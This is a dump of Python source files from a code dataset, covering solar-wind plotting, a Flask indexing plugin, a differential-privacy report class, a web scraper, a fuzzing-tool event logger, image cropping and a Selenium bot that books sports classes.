((ax0,ax1),(ax2,ax3),(ax4,ax5),(ax6,ax7)) = plt.subplots(nrows=4,ncols=2,figsize=(15,10))\nfig.suptitle('Elemental Abundance Ratios',fontsize='large')\nfig.text(0.5,0,'Solar Wind Speed (km/s)',ha='center',va='center',fontsize='large')\nax0.errorbar(hespeed2 + 5, he2omed2, yerr=[he2olow2, he2oupp2], fmt='bo',label=\"Coronal Hole\")\n#ax0.errorbar(hespeed0 + 10,he2omed0[:20],yerr=[he2olow0[:20],he2oupp0[:20]], fmt='ro',label=\"Bulk\")\nax0.errorbar(hespeed1 + 15,he2omed1,yerr=[he2olow1,he2oupp1],fmt='ro',label='CME')\nax0.errorbar(hespeed3 , he2omed3,yerr=[he2olow3,he2oupp3], fmt='go',label=\"Interstream\")\nax0.set_ylabel('He/O',fontweight = 'bold')\nax0.set_yscale('log')\nax0.set_ylim(ymin=30,ymax=300)\n\nax0.legend(numpoints=1,loc=\"lower right\")\n\n\n\nax1.errorbar(cspeed2+5, c2omed2, yerr =[c2olow2, c2oupp2], fmt='bo' )\nax1.errorbar(cspeed1+10,c2omed1,yerr=[c2olow1,c2oupp1], fmt='ro')\nax1.errorbar(cspeed3,c2omed3,yerr=[c2olow3,c2oupp3], fmt='go')\n#ax1.errorbar(jvel[:20],c2omed0[:25],yerr=[c2olow0[:25],c2oupp0[:25]],fmt='yo')\nax1.set_yscale('log')\nax1.yaxis.set_label_position('right')\nax1.set_ylabel('C/O',fontweight='bold')\nax1.set_ylim(ymin=0.25,ymax=2.)\n\n\n\nax2.errorbar(nspeed2+5,n2omed2, yerr=[n2olow2,n2oupp2], fmt='bo')\nax2.errorbar(nspeed1+10,n2omed1,yerr=[n2olow1,n2oupp1], fmt='ro')\nax2.errorbar(nspeed3,n2omed3,yerr=[n2olow3,n2oupp3], fmt='go')\n#ax2.errorbar(jvel[:20],n2omed0[:25],yerr=[n2olow0[:25],n2oupp0[:25]],fmt='yo')\nax2.set_yscale('log')\nax2.set_ylabel('N/O',fontweight='bold')\nax2.set_ylim(ymin=0.075,ymax=0.7)\n\n\n\nax3.errorbar(nespeed2+5,ne2omed2,yerr=[ne2olow2,ne2oupp2],fmt='bo')\nax3.errorbar(nespeed1+10,ne2omed1,yerr=[ne2olow1,ne2oupp1], fmt='ro')\nax3.errorbar(nespeed3,ne2omed3,yerr=[ne2olow3,ne2oupp3], fmt='go')\n#ax3.errorbar(jvel[:20],ne2omed0[:25],yerr=[ne2olow0[:25],ne2oupp0[:25]],fmt='yo')\nax3.set_yscale('log')\nax3.yaxis.set_label_position('right')\nax3.set_ylabel('Ne/O',fontweight='bold')\nax3.set_ylim(ymin=0.06,ymax=0.6)\n\n\n\nax4.errorbar(mgspeed2+5,mg2omed2,yerr=[mg2olow2,mg2oupp2],fmt='bo')\nax4.errorbar(mgspeed1+10,mg2omed1,yerr=[mg2olow1,mg2oupp1], fmt='ro')\nax4.errorbar(mgspeed3,mg2omed3,yerr=[mg2olow3,mg2oupp3], fmt='go')\n#ax4.errorbar(jvel[:20],mg2omed0[:25],yerr=[mg2olow0[:25],mg2oupp0[:25]],fmt='yo')\nax4.set_yscale('log')\nax4.set_ylabel('Mg/O',fontweight='bold')\nax4.set_ylim(ymin=0.05,ymax=0.5)\n\n\n\nax5.errorbar(sispeed2+5,si2omed2,yerr=[si2olow2,si2oupp2],fmt='bo')\nax5.errorbar(sispeed1+10,si2omed1,yerr=[si2olow1,si2oupp1], fmt='ro')\nax5.errorbar(sispeed3,si2omed3,yerr=[si2olow3,si2oupp3], fmt='go')\n#ax5.errorbar(jvel[:20],si2omed0[:25],yerr=[si2olow0[:25],si2oupp0[:25]],fmt='yo')\nax5.set_yscale('log')\nax5.yaxis.set_label_position('right')\nax5.set_ylabel('Si/O',fontweight='bold')\nax5.set_ylim(ymin=0.05,ymax=0.5)\n\n\n\nax6.errorbar(sspeed2+5,s2omed2,yerr=[s2olow2,s2oupp2],fmt='bo')\nax6.errorbar(sspeed1+10,s2omed1,yerr=[s2olow1,s2oupp1], fmt='ro')\nax6.errorbar(sspeed3,s2omed3,yerr=[s2olow3,s2oupp3], fmt='go')\n#ax6.errorbar(jvel[:20],s2omed0[:25],yerr=[s2olow0[:25],s2oupp0[:25]],fmt='yo')\nax6.set_yscale('log')\nax6.set_ylabel('S/O',fontweight='bold')\nax6.set_ylim(ymin=0.025)\n\n\n\nax7.errorbar(fespeed2+5,fe2omed2,yerr=[fe2olow2,fe2oupp2],fmt='bo')\nax7.errorbar(fespeed1+10,fe2omed1,yerr=[fe2olow1,fe2oupp1], fmt='ro')\nax7.errorbar(fespeed3,fe2omed3,yerr=[fe2olow3,fe2oupp3], fmt='go')\n#ax7.errorbar(jvel[:20],fe2omed0[:25],yerr=[fe2olow0[:25],fe2oupp0[:25]],fmt='yo')\nax7.set_yscale('log')\nax7.yaxis.set_label_position('right')\nax7.set_ylabel('Fe/O',fontweight='bold')\nax7.set_ylim(ymin=0.07)\n\n\n\nfig, (axo76) = plt.subplots(1,1)\naxo76.errorbar(o76speed2+5,o76med2,yerr=[o76low2,o76upp2],fmt='bo',label = 'Fast wind')\naxo76.errorbar(o76speed1+10,o76med1,yerr=[o76low1,o76upp1],fmt='ro',label = 'CME')\naxo76.errorbar(o76speed3,o76med3,yerr=[o76low3,o76upp3],fmt='go',label = 'Slow Wind')\n#axo76.errorbar(jvel[:20],o76med0[:25],yerr=[o76low0[:25],o76upp0[:25]],fmt='yo',label='other')\naxo76.set_yscale('log')\naxo76.set_xlabel(r'Solar Wind Speed (km/s)',fontweight = \"bold\")\naxo76.set_ylabel(r'${\\bf {O^{\\bf 7+}/O^{\\bf 6+}}}$ Abundance Ratio',fontweight = 'bold')\naxo76.set_ylim(-3,1)\naxo76.legend(numpoints = 1, loc = 'lower left')\n\nplt.show()\n\n","sub_path":"plotting_x2oWgeometricmean_v1.py","file_name":"plotting_x2oWgeometricmean_v1.py","file_ext":"py","file_size_in_byte":11714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"529983355","text":"from collections import defaultdict\nfrom itertools import groupby\n\nfrom flask import current_app, render_template_string, request, abort, redirect, Markup, url_for\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.orm import relationship\n\nimport quoted_forsooth.plugins.report_plugin as report_plugin\nfrom quoted_forsooth import db\nfrom quoted_forsooth.db import session_scope\nfrom quoted_forsooth.utils import natural_key\n\nedit_template = \"\"\"\n{% extends \"form_base.html\" %}\n{% block title %}{% if index_entry.id %}Edit{% else %}Add{% endif %} index entry - Quoted Forsooth{% endblock %}\n{% block formContent %}\n
\n

{% if index_entry.id %}Edit{% else %}Add a new{% endif %} index entry

\n
\n {% if index_entry.id %}{% endif %}\n
\n \n
\n \n
\n
\n
\n \n
\n \n
\n
\n
\n \n
\n \n
\n
\n
\n \n
\n \n
\n
\n
\n
\n \n
\n
\n
\n
\n{% endblock %}\n\"\"\"\n\nview_template = \"\"\"\n{% extends \"base.html\" %}\n{% block title %}Index entries - Quoted Forsooth{% endblock %}\n{% block pageContent %}\n\n
\n
    \n {%- for t in terms recursive %}\n
  • {{t.part}}{% if t.entries %},
      \n {%- for entry in t.entries %}\n
    • {{entry.source}} {{entry.location}}
    • \n {%- endfor %}\n
    \n {%- endif %}\n {%- if t.children %}\n
      {{loop(t.children)}}
    \n {%- endif %}\n
  • \n {%- endfor %}\n
\n
\n{% endblock %}\n\"\"\"\n\nplugin_section_template = \"\"\"\n
\n

Index entries (formatted)

\n\n \n \n \n \n {%- for entry in index_entries %}\n \n \n \n \n {%- endfor %}\n
TermLocation
{{', '.join(entry.term.split('|'))}}{{entry.location.replace('--', '–')|safe}}
\n
\n\"\"\"\n\nclass IndexEntryPlugin(report_plugin.ReportPlugin):\n url_name = 'index_entries'\n\n class IndexEntry(db.Base):\n __tablename__ = 'plugin_index_entry'\n id = Column(Integer, primary_key=True)\n source_id = Column(Integer, ForeignKey('sources.id'), nullable=False, index=True)\n term = Column(String, nullable=False)\n sort_term = Column(String, nullable=True)\n location = Column(String, nullable=False)\n\n source = relationship('Source', backref='plugin_index_entry_entries')\n\n def __str__(self):\n return \", \".join(self.term.split('|'))\n\n def __repr__(self):\n return \"IndexEntry(id={}, source_id={}, term={!r}, location={!r})\".format(\n self.id, self.source_id, self.term, self.location)\n \n @property\n def _sortkey(self):\n return (self.sort_term.lower() if self.sort_term else self.term.lower(), self.term, natural_key(self.location))\n\n def __lt__(self, other):\n if not isinstance(other, IndexEntryPlugin.IndexEntry):\n raise NotImplementedError\n\n return self._sortkey < other._sortkey\n\n @staticmethod\n def edit(index_entry_id=None):\n with session_scope() as session:\n if index_entry_id:\n index_entry = session.query(db.IndexEntry).get(index_entry_id)\n if not index_entry:\n abort(404)\n else:\n index_entry = db.IndexEntry()\n if request.values.get('source_id', type=int):\n source = session.query(db.Source).get(request.values.get('source_id', type=int))\n if source:\n index_entry.source = source\n page = render_template_string(edit_template, index_entry=index_entry)\n session.rollback()\n return page\n\n @staticmethod\n def edit_post():\n with session_scope() as session:\n entry_id = request.form.get('db_id', type=int)\n if entry_id:\n entry = session.query(db.IndexEntry).get(entry_id)\n if not entry:\n abort(404)\n else:\n entry = db.IndexEntry()\n\n term = request.form.get('term')\n sort_term = request.form.get('sort_term')\n location = request.form.get('location')\n source_id = request.form.get('source', type=int)\n if not (term and location and source_id):\n abort(400)\n\n source = session.query(db.Source).get(source_id)\n if not source:\n abort(404)\n\n entry.source = source\n entry.location = location\n entry.term = '|'.join(x.strip() for x in term.split('|'))\n entry.sort_term = '|'.join(x.strip() for x in sort_term.split('|')) if sort_term else None\n\n session.add(entry)\n\n return redirect(source.internal_url)\n\n def view(self):\n with session_scope() as session:\n q = session.query(db.IndexEntry)\n\n source_id = request.values.get('source_id', type=int)\n if source_id:\n q = q.filter(db.IndexEntry.source_id == source_id)\n\n results = sorted(q)\n terms = []\n for term, l in groupby(results, lambda e: e.term):\n for t in terms:\n if term.split('|')[0] == t['part']:\n sub = t\n break\n else:\n newsub = {'part' : term.split('|')[0], 'entries' : [], 'children' : []}\n terms.append(newsub)\n sub = newsub\n for part in term.split('|')[1:]:\n if not any(part == t['part'] for t in sub['children']):\n newsub = {'part' : part, 'entries' : [], 'children' : []}\n sub['children'].append(newsub)\n sub = newsub\n else:\n for t in sub['children']:\n if part == t['part']:\n sub = t\n ents = sorted(l, key=lambda s: (s.source, natural_key(s.location)))\n entries = [{\n 'source' : g,\n 'location' : Markup(', '.join(e.location for e in l).replace('--', '–'))\n } for g, l in groupby(ents, lambda s: s.source)]\n sub['entries'] = entries\n\n return render_template_string(view_template, terms=terms)\n\n @classmethod\n def plugin_section(cls, source):\n if source.plugin_index_entry_entries:\n index_entries = sorted(source.plugin_index_entry_entries)\n entries = [{'term' : t, 'location' : ', '.join('{}'.format(url_for('plugin.index_entry.edit', index_entry_id=e.id), e.location) for e in l)} for t, l in groupby(index_entries, lambda e: e.term)]\n return render_template_string(plugin_section_template, index_entries=entries, source_id=source.id)\n else:\n return None\n\n @classmethod\n def plugin_link(cls, source):\n return Markup('Add index entry'.format(url_for('plugin.index_entry.edit', source_id=source.id)))\n\n def activate(self):\n setattr(db, 'IndexEntry', self.IndexEntry)\n db.Base.metadata.create_all(db.engine, tables=[self.IndexEntry.__table__])\n super().activate()\n current_app.add_url_rule('/plugin/index_entry//edit/', \"plugin.index_entry.edit\", self.edit)\n current_app.add_url_rule('/plugin/index_entry/add/', \"plugin.index_entry.edit\", self.edit)\n current_app.add_url_rule('/plugin/index_entry/edit/', \"plugin.index_entry.edit_post\", self.edit_post, methods=['POST'])\n db.Source._plugin_sections.append(self.plugin_section)\n db.Source._plugin_links.append(self.plugin_link)\n","sub_path":"plugins/index_entry.py","file_name":"index_entry.py","file_ext":"py","file_size_in_byte":9840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70539327","text":"import pandas as pd\nimport numpy as np\n\nclass Report:\n\t\"\"\"\n\tDefines the consistent schema of reported fields\n\tthat aid evaluation of a black box DP implementation\n\t* res_df: It is a dataframe that contains repeated \n\tanalysis results across dimension and numerical\n\tcolumns. It could be exact or noisy based on the \n\tparameter actual = False or True in analysis\n\t* dim_cols: List of columns that contain dimension\n\tstrings\n\t* num_cols: List of columns that contain numerical\n\tDP results\n\t\"\"\"\n\tdef __init__(self, df):\n\t\tself.res_df = df\n\t\tself.dim_cols = []\n\t\tself.num_cols = []\n\n\t\tfor col in self.res_df:\n\t\t\tprint(self.res_df[col].dtype)\n\t\t\tif(self.res_df[col].dtype != np.number):\n\t\t\t\tself.dim_cols.append(col)\n\t\t\telse:\n\t\t\t\tself.num_cols.append(col)\n\t\t\n\t\tif(len(self.dim_cols) == 0):\n\t\t\tself.dim_cols.append(\"__dim__\")\n\n\t\tif(self.dim_cols[0] == \"__dim__\"):\n\t\t\tself.res_df[self.dim_cols[0]] = [\"key\"]*len(self.res_df)","sub_path":"sdk/opendp/whitenoise/evaluation/report/_report.py","file_name":"_report.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"638599871","text":"import re\nfrom urllib import request\nfrom urllib import error\nclass BDTB:\n def __init__(self,TBCode):\n self.TBCode = TBCode\n self.url = 'http://tieba.baidu.com/p/' + self.TBCode\n def getContent(self):\n agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'\n headers = {'User-Agent':agent}\n try:\n req = request.Request(self.url,headers = headers)\n res = request.urlopen(req)\n data = res.read().decode('UTF-8')\n except error.URLError as e:\n print(e.code)\n with open('d://MyGit/PyCode/tb.txt', 'w+') as f:\n f.write(data)\n print(data.encode('utf-8').decode('utf-8'))\n print(self.url)\n return data\n def getTotalPage(self, data):\n pattern =r'(\\d+)\"页\"'\n total = re.findall(pattern,self.getContent(),re.S)\n print(total)\n\ntb = BDTB('5264180656')\ntb.getTotalPage(tb.getContent())\n","sub_path":"BDTBcrawler/BDTB.py","file_name":"BDTB.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396060379","text":"import turtle, math\n\npen = turtle.Turtle()\nscrn = turtle.Screen()\n# wid = 1020\n# hght = wid\n# scrn.setworldcoordinates(10, 0, wid, hght)\n# scrn.screensize(1920, 1080)\nscrn.bgcolor('black')\npen.color('white')\npen.dot()\n\na = 200\nb = a / 2\n\ndef fnEllipse(x):\n y = round((b / a) * (math.sqrt(a ** 2 - x ** 2)), 2)\n return y\n\n# this only covers (-x, +y) and (+x, +y)\ncoordsEllipse = [(x, fnEllipse(x)) for x in range(-a, a+1)]\n\n# this only covers +ve y-axis i.e. (-x, +y) and (+x, +y)\nfor coord in coordsEllipse:\n pen.setpos((coord[0], coord[1]))\n\n# this covers -ve y-axis i.e. (+x, -y) and (-x, -y)\nfor coord in coordsEllipse:\n pen.setpos((coord[0], -coord[1]))\n\nturtle.done()\n\n","sub_path":"draw_shapes_using_fx.py","file_name":"draw_shapes_using_fx.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450091928","text":"# Copyright 2017 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport time\nimport pickle\n\n\nclass Event(object):\n # Contains all the information about a method call\n def __init__(self, name=None, method=None, url=None, json_input=None,\n inputs=None, data=None):\n if data:\n self.__dict__ = data\n return\n self.start_time = time.time()\n self.name = name\n self.method = method\n self.url = url\n self.json_input = json_input\n self.json_output = None\n self.inputs = inputs\n self.outputs = None\n self.elapsed = 0\n self.code = -1\n self.tracebacks = []\n self.resources = None\n\n def get(self, item):\n if item in self.__dict__:\n return self.__dict__[item]\n\n def set_resp(self, resp):\n self.end_time = time.time()\n self.elapsed = self.end_time - self.start_time\n self.code = resp.status_code\n self.json_output = resp.text\n\n def render(self, color=''):\n def strip(txt):\n if not txt:\n return txt\n try:\n txt = \"\".join(list(filter(\n lambda x: ord(x) >= 32 and ord(x) < 127, txt)))\n except Exception:\n txt = \"(render-failed)\"\n return txt\n ftime = \"%s.%03.0f\" % (\n time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n (self.start_time - int(self.start_time)) * 1000\n )\n tb = \"\"\n new_tb = []\n for t in self.tracebacks:\n if \"uniq_tb\" in t:\n new_tb.append(t[\"uniq_tb\"])\n tb += \", %s\" % t[\"tb_id\"]\n if new_tb:\n new_tb = \"\\n%s\" % \"\\n\".join(new_tb)\n else:\n new_tb = \"\"\n return \"[%s] \\033[93m%s\\033[0m: %s%d| curl -X %4s %s\\033[0m \" \\\n \"-d '%s' -> '%s'%s%s\" % (\n ftime, self.name, color,\n self.code, self.method, strip(self.url),\n strip(self.json_input), strip(self.json_output),\n tb, new_tb\n )\n\n def __str__(self):\n return self.render()\n\n def __repr__(self):\n return str(self)\n\n\nclass EventDb:\n def __init__(self, db_file):\n self.db = db_file\n\n def __del__(self):\n self.db.close()\n\n def append(self, event):\n pickle.dump(event.__dict__, self.db)\n\n def list(self):\n self.db.seek(0)\n try:\n while True:\n try:\n e = pickle.load(self.db)\n yield Event(data=e)\n except Exception:\n print(\"[+] could not pickle.load at offset\",\n self.db.tell())\n raise\n except EOFError:\n pass\n","sub_path":"restfuzz/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"544807002","text":"from __future__ import print_function\nimport sys, os.path, json, glob\nimport cv2, numpy as np\n\nfolders = glob.glob('dataset/' + sys.argv[1] + '/*/*')\n\nfor folder in folders:\n print(folder)\n\n if os.path.exists(folder + '/fixed'):\n continue\n\n with open(folder + '/faces.json', \"r\") as load_f:\n faces_json = json.load(load_f)\n padded_folder = folder + '/padded_faces/'\n \n for image_name, data in list(faces_json.items()):\n image = image_name.encode('utf-8').decode('utf-8')\n enc_image = image.encode('utf-8')\n\n with open(folder + '/' + enc_image, 'rb') as br:\n b = np.frombuffer(br.read(), dtype=np.uint8)\n img = cv2.imdecode(b, flags=1)\n if img is None:\n continue\n img_h, img_w = img.shape[0:2]\n\n for faceN, faceValue in list(data['faces'].items()):\n bounds = faceValue['bounds']\n l, r, t, b = bounds['left'], bounds['right'], bounds['top'], bounds['bottom']\n face_w, face_h = r - l, b - t\n\n square_dim = min(min(img_w, r + 0.7 * face_w) - max(0, l - 0.7 * face_w), min(img_h, b + face_h) - max(0, t - 0.4 * face_h))\n square_pad_w, square_pad_h = square_dim - face_w, square_dim - face_h\n pl, pr, pt, pb = max(0, int(l - 0.5 * square_pad_w)), min(img_w, int(r + 0.5 * square_pad_w)), max(0, int(t - 0.3 * square_pad_h)), min(img_h, int(b + 0.7 * square_pad_h))\n faces_json[image_name]['faces'][faceN]['padded_bounds'] = {'left' : pl, 'right' : pr, 'top' : pt, 'bottom' : pb}\n cv2.imwrite(padded_folder + str(faceN) + \"_\" + enc_image, img[pt:pb, pl:pr])\n\n with open(folder + '/faces.json', \"w\") as write_faces:\n json.dump(faces_json, write_faces)\n with open(folder + '/fixed', \"w\") as write_fixed:\n print('', file=write_fixed)\n","sub_path":"scripts/misc/fix_empty_padded.py","file_name":"fix_empty_padded.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199495660","text":"# encoding: utf-8\n\nimport fileinput\n\n# ask for the txt file with the answers\n\nanswers_txt = input(\"insert the name of the file with the answer-sheet in txt: \")\n\nwith open(answers_txt) as f:\n \n mylist = f.read().splitlines()\n\nanswer_list = []\n\nfor string in mylist:\n \n if string==\"A\" or string==\"B\" or string==\"C\" or string==\"D\":\n\n answer_list.append(string+\") \")\n\nas_len = len(answer_list)\n\nprint (answer_list, as_len)\n\nif as_len != 70:\n \n exit(\"did not get all the answers from the answer-sheet, exit the program\")\n\niter_num = -1\n\noriginal_file = input(\"insert the name of the raw file, still missing the answer-sheet: \")\n\ndef convert_to_string(lista):\n \n new_list = []\n\n for i in lista:\n\n new_list.append(str(i))\n\n return new_list \n\nzero_to_nine = list(range(0,10))\n\nzero_to_nine = convert_to_string(zero_to_nine)\n\nten_to_eighty = list(range(10,81))\n\nten_to_eighty = convert_to_string(ten_to_eighty)\n\n\nwith open(original_file, 'r') as input_file, open('output_file.txt', 'w') as output_file:\n \n for line in input_file:\n \n # print (answer_list[iter_num])\n \n if iter_num==as_len:\n\n break\n \n elif line[:3]==answer_list[iter_num]:\n \n string = line\n new_string = string[:1]+\":CORRECT)\"+string[2:]\n\n output_file.write(new_string)\n \n # print (line) \n # print (new_string)\n\n elif line[:7]==\"OPTIONS\":\n \n iter_num += 1\n \n output_file.write(line)\n \n elif (line[0] in zero_to_nine) and (line[1]==\".\"):\n \n deleted_num_point = line[0]+line[1]\n\n line = line.replace(deleted_num_point,\"\")\n\n output_file.write(line)\n\n\n elif (line[:2] in ten_to_eighty) and (line[2]==\".\"):\n\n deleted_num_point = line[0]+line[1]+line[2]\n\n line = line.replace(deleted_num_point,\"\")\n\n output_file.write(line)\n\n else:\n\n # print(line)\n output_file.write(line)\n\n\n\n","sub_path":"src/insert_answer_simulated.py","file_name":"insert_answer_simulated.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610368778","text":"#####################################################################\r\n################### VARIANCE INFLATION FACTOR #######################\r\n#####################################################################\r\n\r\n# REG1\r\ndf_reg1 = df_reg1.dropna()\r\ndf_reg2 = df_reg2.dropna()\r\n\r\ndf_reg1a = add_constant(df_reg1)\r\ndf_reg1a = df_reg1a.drop(['study','totalabsdiff'], axis=1)\r\n#VIF\r\nVIFreg1 = pd.Series([variance_inflation_factor(df_reg1a.values, i)\r\nfor i in range(df_reg1a.shape[1])],\r\nindex=df_reg1a.columns)\r\n\r\nreg1_index = (\"Constant\",\"Frequency\",\"Number of respondents\",\"Number of choice tasks\",\"Number of SKU's per task\",\"Number of SKU's in market\",\"Number of competitors\")\r\n\r\nVIFreg1tab = zip(reg1_index,VIFreg1)\r\nprint(tabulate(VIFreg1tab, tablefmt=\"latex_booktabs\"))\r\n# * Lot of multicol > shrinkage method, regression\r\n# ? ridge/lasso/elastic net\r\n\r\n# REG2\r\nX= add_constant(df_reg2)\r\n#VIF\r\npd.Series([variance_inflation_factor(X.values, i)\r\n for i in range(X.shape[1])],\r\n index=X.columns)\r\n# * No multicol > regular regression\r\n\r\n# FULL REG2B\r\ndf_reg2b2 = df_reg2b.drop(columns='study')\r\nX = add_constant(df_reg2b2)\r\n#VIF\r\npd.Series([variance_inflation_factor(X.values, i)\r\n for i in range(X.shape[1])],\r\n index=X.columns)\r\n","sub_path":"2vif.py","file_name":"2vif.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171458349","text":"#!/home/delt/asvz_bot/asvz_bot/bin/python\n\n\"\"\"\nCreated on: Mar 20, 2019\nAuthor: Julian Stiefel\nEdited: Patrick Barton and Matteo Delucchi, October 2020\nLicense: BSD 3-Clause\nDescription: Script for automatic enrollment in ASVZ classes\n\"\"\"\n\nimport time\nimport math\nimport argparse\nimport configparser\nimport telegram_send\nimport geckodriver_autoinstaller\nfrom datetime import datetime, timedelta\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\n\nday2int = {'Montag': 0,\n 'Dienstag': 1,\n 'Mittwoch': 2,\n 'Donnerstag': 3,\n 'Freitag': 4,\n 'Samstag': 5,\n 'Sonntag': 6}\n\n\ndef waiting_fct():\n def get_lesson_datetime(day, train_time):\n # find next date with that weekday\n nextDate = datetime.today().date()\n while nextDate.weekday() != day2int[day]:\n nextDate += timedelta(days=1)\n\n # combine with training time for complete date and time object\n lessonTime = datetime.strptime(train_time, '%H:%M').time()\n return datetime.combine(nextDate, lessonTime)\n\n lessonTime = get_lesson_datetime(config['lesson']['day'], config['lesson']['lesson_time'])\n enrollmentTime = lessonTime - timedelta(hours=config['lesson'].getint('enrollment_time_difference'))\n\n # Wait till enrollment opens if script is started before registration time\n delta = enrollmentTime - datetime.today()\n while delta > timedelta(seconds=60):\n print(\"Time till enrollment opens: \" + str(delta))\n if delta < timedelta(minutes=1):\n time.sleep(math.ceil(delta.total_seconds()))\n elif delta < timedelta(minutes=5):\n time.sleep(60)\n elif delta < timedelta(hours=1):\n time.sleep(5*60)\n else:\n time.sleep(60*60)\n delta = enrollmentTime - datetime.today()\n return\n\n\ndef asvz_enroll(args):\n print('Attempting enroll...')\n options = Options()\n options.headless = True\n options.add_argument(\"--private\") # open in private mode to avoid different login scenario\n driver = webdriver.Firefox(options=options)\n\n print('Attempting to get sportfahrplan')\n driver.get(config['lesson']['sportfahrplan_particular'])\n driver.implicitly_wait(5) # wait 5 seconds if not defined differently\n print(\"Sportfahrplan retrieved\")\n\n # find corresponding day div:\n day_ele = driver.find_element_by_xpath(\n \"//div[@class='teaser-list-calendar__day'][contains(., '\" + config['lesson']['day'] + \"')]\")\n\n # search in day div after corresponding location and time\n lesson_xpath = \".//li[@class='btn-hover-parent'][contains(., '\" + config['lesson']['facility'] + \"')][contains(., '\" \\\n + config['lesson']['lesson_time'] + 'bis'\"')]\"\n if config['lesson']['description']:\n lesson_xpath += \"[contains(., '\" + config['lesson']['description'] + \"')]\"\n\n try:\n lesson_ele = day_ele.find_element_by_xpath(lesson_xpath)\n except NoSuchElementException as identifier:\n # click on \"load more\" button\n driver.find_element_by_xpath(\"//button[@class='btn btn--primary separator__btn']\").click()\n lesson_ele = day_ele.find_element_by_xpath(lesson_xpath)\n\n # check if the lesson is already booked out\n full = len(lesson_ele.find_elements_by_xpath(\".//div[contains(text(), 'Keine freien')]\"))\n if full:\n print('Lesson already fully booked. Retrying in ' + str(args.retry_time) + 'min')\n driver.quit()\n time.sleep(args.retry_time * 60)\n return False\n\n # Save Lesson information for Telegram Message\n message = lesson_ele.text\n print(\"Booking: \", message)\n\n lesson_ele.click()\n\n WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable((By.XPATH,\n \"//a[@class='btn btn--block btn--icon relative btn--primary-border' or @class='btn btn--block btn--icon relative btn--primary']\"))).click()\n\n # switch to new window:\n time.sleep(2) # necessary because tab needs to be open to get window handles\n tabs = driver.window_handles\n driver.switch_to.window(tabs[1])\n WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(\n (By.XPATH, \"//button[@class='btn btn-default ng-star-inserted' and @title='Login']\"))).click()\n WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(\n (By.XPATH, \"//button[@class='btn btn-warning btn-block' and @title='SwitchAai Account Login']\"))).click()\n\n # choose organization:\n organization = driver.find_element_by_xpath(\"//input[@id='userIdPSelection_iddtext']\")\n organization.send_keys(config['creds']['organisation'])\n organization.send_keys(u'\\ue006')\n\n driver.find_element_by_xpath(\"//input[@id='username']\").send_keys(config['creds']['username'])\n driver.find_element_by_xpath(\"//input[@id='password']\").send_keys(config['creds']['password'])\n driver.find_element_by_xpath(\"//button[@type='submit']\").click()\n print('Logged in')\n\n enroll_button_locator = (By.XPATH,\n \"//button[@id='btnRegister' and @class='btn-primary btn enrollmentPlacePadding ng-star-inserted']\")\n try:\n WebDriverWait(driver, args.max_wait).until(EC.visibility_of_element_located(enroll_button_locator))\n except:\n print('Element not visible. Probably fully booked. Retrying in ' + str(args.retry_time) + 'min')\n driver.quit()\n time.sleep(args.retry_time * 60)\n return False\n\n try:\n enroll_button = WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(enroll_button_locator))\n except:\n driver.quit()\n raise ('Enroll button is disabled. Enrollment is likely not open yet.')\n\n print('Waiting for enroll button to be enabled')\n WebDriverWait(driver, 90).until(lambda d: 'disabled' not in enroll_button.get_attribute('class'))\n enroll_button.click()\n print(\"Successfully enrolled. Train hard and have fun!\")\n\n WebDriverWait(driver, 2)\n driver.quit() # close all tabs and window\n return message\n\n\n# ==== run enrollment script ============================================\n\n# Check if the current version of geckodriver exists\n# and if it doesn't exist, download it automatically,\n# then add geckodriver to path\ngeckodriver_autoinstaller.install()\n\nparser = argparse.ArgumentParser(description='ASVZ Bot script')\nparser.add_argument('config_file', type=str, help='config file name')\nparser.add_argument('--retry_time', type=int, default=5,\n help='Time between retrying when class is already fully booked in seconds')\nparser.add_argument('--max_wait', type=int, default=20, help='Max driver wait time (s) when attempting an action')\nparser.add_argument('-t', '--telegram_notifications', action='store_true', help='Whether to use telegram-send for notifications')\nargs = parser.parse_args()\n\nconfig = configparser.ConfigParser(allow_no_value=True)\nconfig.read(args.config_file)\nconfig.read('credentials.ini')\n\nwaiting_fct()\n\n# If lesson is already fully booked keep retrying in case place becomes available again\nsuccess = False\nwhile not success:\n try:\n success = asvz_enroll(args)\n except:\n if args.telegram_notifications:\n telegram_send.send(messages=['Script stopped. Exception occurred :('])\n raise\n\nif args.telegram_notifications:\n 